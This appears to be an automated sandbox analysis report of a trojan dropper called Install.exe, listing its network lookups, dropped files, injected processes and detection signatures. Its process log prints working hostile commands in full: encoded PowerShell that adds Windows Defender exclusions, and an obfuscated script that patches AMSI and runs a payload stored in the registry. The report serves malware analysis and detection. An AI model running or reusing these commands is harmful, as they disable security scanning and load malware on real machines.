Source: AppLaunch.exe, 00000005.00000002.512763531.0000000006D47000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com4Uk
Source: Install.exe, 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Install.exe, 00000001.00000000.217633196.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.288800846.000001FF51E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.430121118.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.477975029.00000283A06B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.298759051.000001FF53502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.299698983.000001FF5367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.300217713.000001FF53864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.493191066.00000283A1A2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.422394060.00000283A2335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.423315665.00000283A242E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Install.exe

1_2_004056DE

System Summary

Very long command line found

Source: unknown	Process created: Commandline size = 2585
Source: unknown	Process created: Commandline size = 2578

Detected potential crypto function

Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_0040755C	1_2_0040755C
Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_00406D85	1_2_00406D85
Source: C:\Users\user\AppData\Roaming\34432.exe	Code function: 4_2_00007FFF7E401C9B	4_2_00007FFF7E401C9B
Source: C:\Users\user\AppData\Roaming\34432.exe	Code function: 4_2_00007FFF7E405C20	4_2_00007FFF7E405C20
Source: C:\Users\user\AppData\Roaming\34432.exe	Code function: 4_2_00007FFF7E401CCC	4_2_00007FFF7E401CCC
Source: C:\Users\user\AppData\Roaming\34432.exe	Code function: 4_2_00007FFF7E401D60	4_2_00007FFF7E401D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0532148E	5_2_0532148E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05327D90	5_2_05327D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05321DC1	5_2_05321DC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0532DF00	5_2_0532DF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0532BFA0	5_2_0532BFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0532C870	5_2_0532C870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05320868	5_2_05320868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05320B48	5_2_05320B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05321587	5_2_05321587
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_053220F8	5_2_053220F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0532BC58	5_2_0532BC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05321E71	5_2_05321E71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05320B39	5_2_05320B39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05320B82	5_2_05320B82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05327A38	5_2_05327A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_09417560	5_2_09417560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_09417570	5_2_09417570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E3F1958	8_2_00007FFF7E3F1958
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E3F19B8	8_2_00007FFF7E3F19B8
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140001000	22_2_0000000140001000
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_00000001400011D0	22_2_00000001400011D0
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140006C10	22_2_0000000140006C10
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140005098	22_2_0000000140005098
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140006E1C	22_2_0000000140006E1C
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_000000014000AABC	22_2_000000014000AABC
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_000000014000CAD8	22_2_000000014000CAD8
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F4640	30_2_00007FFF7E3F4640
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F1C9B	30_2_00007FFF7E3F1C9B
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F1CCC	30_2_00007FFF7E3F1CCC
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F1D60	30_2_00007FFF7E3F1D60
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 33_2_00007FFF7E401C9B	33_2_00007FFF7E401C9B
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 33_2_00007FFF7E401CCC	33_2_00007FFF7E401CCC
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 33_2_00007FFF7E401D60	33_2_00007FFF7E401D60
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140001000	39_2_0000000140001000
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140001420	39_2_0000000140001420
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140001430	39_2_0000000140001430
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_000000014000558C	39_2_000000014000558C
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_00000001400071BC	39_2_00000001400071BC
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_000000014000B2CC	39_2_000000014000B2CC
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_000000014000D2E8	39_2_000000014000D2E8
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_00000001400073C8	39_2_00000001400073C8
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDCDC4E4	42_2_000001AFDDCDC4E4
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDCE2418	42_2_000001AFDDCE2418
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDCD0800	42_2_000001AFDDCD0800
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDCE0400	42_2_000001AFDDCE0400
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDCDC2D8	42_2_000001AFDDCDC2D8
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDCD1660	42_2_000001AFDDCD1660
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD01400	42_2_000001AFDDD01400
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD0D0E4	42_2_000001AFDDD0D0E4
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD13018	42_2_000001AFDDD13018
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD11000	42_2_000001AFDDD11000
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD0CED8	42_2_000001AFDDD0CED8
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD02260	42_2_000001AFDDD02260
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2B8C4E4	44_2_00000240B2B8C4E4
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2B8C2D8	44_2_00000240B2B8C2D8
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2B81660	44_2_00000240B2B81660
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2B92418	44_2_00000240B2B92418
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2B80800	44_2_00000240B2B80800
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2B90400	44_2_00000240B2B90400
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BBD0E4	44_2_00000240B2BBD0E4
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BBCED8	44_2_00000240B2BBCED8
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BB2260	44_2_00000240B2BB2260
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BC3018	44_2_00000240B2BC3018
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BB1400	44_2_00000240B2BB1400
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BC1000	44_2_00000240B2BC1000
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3CE2418	47_2_000001CAF3CE2418
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3CE0400	47_2_000001CAF3CE0400
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3CD0800	47_2_000001CAF3CD0800
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3CDC2D8	47_2_000001CAF3CDC2D8
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3CD1660	47_2_000001CAF3CD1660
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3CDC4E4	47_2_000001CAF3CDC4E4
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D01400	47_2_000001CAF3D01400
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D02260	47_2_000001CAF3D02260
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D0D0E4	47_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D13018	47_2_000001CAF3D13018
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D11000	47_2_000001CAF3D11000
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D0CED8	47_2_000001CAF3D0CED8
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF11660	49_2_000001B8BFF11660
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF1C4E4	49_2_000001B8BFF1C4E4
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF22418	49_2_000001B8BFF22418
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF10800	49_2_000001B8BFF10800
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF20400	49_2_000001B8BFF20400
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF1C2D8	49_2_000001B8BFF1C2D8
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF41400	49_2_000001B8BFF41400
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF42260	49_2_000001B8BFF42260
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF4D0E4	49_2_000001B8BFF4D0E4
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF53018	49_2_000001B8BFF53018
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF51000	49_2_000001B8BFF51000
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF4CED8	49_2_000001B8BFF4CED8

PE file contains strange resources

Source: Install.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Uses 32bit PE files

Source: Install.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Yara signature match

Source: 33.2.chrome.exe.fa0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 30.0.chrome.exe.20000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 30.2.chrome.exe.20000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 4.0.34432.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 4.2.34432.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 33.0.chrome.exe.fa0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Roaming\34432.exe, type: DROPPED	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, type: DROPPED	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25

Deletes files inside the Windows folder

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_oz5sx3tu.kvs.ps1

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Install.exe

1_2_0040352D

Creates files inside the system directory

Source: C:\Windows\System32\nslookup.exe

File created: C:\Windows\Tasks\nslooksvc32.job

Contains functionality to call native functions

Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140001420 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,LocalFree,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,FindCloseChangeNotification,CloseHandle,	39_2_0000000140001420
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140001430 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,NtCreateThreadEx,CloseHandle,FindCloseChangeNotification,CloseHandle,	39_2_0000000140001430
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD03120 NtEnumerateValueKey,NtEnumerateValueKey,	42_2_000001AFDDD03120

PE file does not import any functions

Source: chrome.exe.4.dr	Static PE information: No import functions for PE file found
Source: 34432.exe.1.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: Install.exe, 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilename34432.exe< vs Install.exe

Source: Install.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Install.exe

File created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@44/26@1/1

Source: C:\Users\user\Desktop\Install.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: chrome.exe.4.dr, u200f????????????????????????????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Windows\System32\nslookup.exe

Code function: 22_2_0000000140001000 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,RegOpenKeyExW,RegSetValueExW,

22_2_0000000140001000

Source: Install.exe	Virustotal: Detection: 41%
Source: Install.exe	ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\Install.exe

File read: C:\Users\user\Desktop\Install.exe

Jump to behavior

Source: C:\Users\user\Desktop\Install.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Install.exe "C:\Users\user\Desktop\Install.exe"
Source: C:\Users\user\Desktop\Install.exe	Process created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Install.exe	Process created: C:\Users\user\AppData\Roaming\34432.exe C:\Users\user\AppData\Roaming\34432.exe
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
